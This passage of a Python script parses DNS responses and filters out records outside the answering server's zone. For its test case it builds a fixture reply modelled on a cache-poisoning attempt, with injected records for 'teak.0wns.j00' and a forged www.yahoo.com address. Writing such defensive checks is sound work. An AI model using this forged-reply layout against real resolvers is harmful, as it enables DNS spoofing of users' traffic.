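    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_response(qname, answers, authority, additional):
    """Fixture only: wire-format reply from (owner, type, rdata) tuples."""
    msg = struct.pack("!HHHHHH", 0x1234, 0x8400, 1,
                      len(answers), len(authority), len(additional))
    msg += encode_name(qname) + struct.pack("!HH", 1, 1)
    for owner, rtype, rdata in answers + authority + additional:
        msg += encode_name(owner)
        msg += struct.pack("!HHIH", rtype, 1, 3600, len(rdata)) + rdata
    return msg


def read_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        if off >= len(msg):
            raise ValueError("name runs past end of message")
        length = msg[off]
        if length & 0xC0 == 0xC0:            # compression pointer
            if off + 1 >= len(msg):
                raise ValueError("truncated compression pointer")
            if end is None:
                end = off + 2                 # parsing resumes after first pointer
            off = ((length & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 32:                     # a pointer can point at itself
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            return ".".join(labels).lower(), off if end is None else end
        labels.append(msg[off:off + length].decode("ascii", "replace"))
        off += length


def parse_response(msg):
    """Return (question name, [(section, owner, type), ...])."""
    _id, _flags, qd, an, ns, ar = struct.unpack_from("!HHHHHH", msg, 0)
    off, qname, records = 12, None, []
    for _ in range(qd):
        qname, off = read_name(msg, off)
        off += 4                              # QTYPE + QCLASS
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            owner, off = read_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
            off += 10 + rdlen
            records.append((section, owner, TYPES.get(rtype, str(rtype))))
    return qname, records


def rejected_records(msg, zone):
    """Records to drop when `msg` came from the server answering for `zone`."""
    zone = zone.strip(".").lower()
    qname, records = parse_response(msg)
    bad = []
    for section, owner, rtype in records:
        if section == "answer":
            ok = owner == qname               # simplified: no CNAME chains
        else:
            ok = owner == zone or owner.endswith("." + zone)
        if not ok:
            bad.append((section, owner, rtype))
    return bad


def sample_response():
    """Constructed sample mirroring the record order in the page's listing."""
    a = socket.inet_aton
    return build_response(
        "begin.ib6ub9.com",
        [("begin.ib6ub9.com", 1, a("127.0.0.1")),
         ("teak.0wns.j00", 1, a("204.154.2.93")),
         ("93.2.154.204.IN-ADDR.ARPA", 12, encode_name("teak.0wns.j00")),
         ("ns.ib6ub9.com", 1, a("205.160.29.19"))],
        [("ib6ub9.com", 2, encode_name("ns.ib6ub9.com"))],
        [("www.yahoo.com", 1, a("255.255.255.255"))])


if __name__ == "__main__":
    for record in rejected_records(sample_response(), "ib6ub9.com"):
        print("reject", record)
```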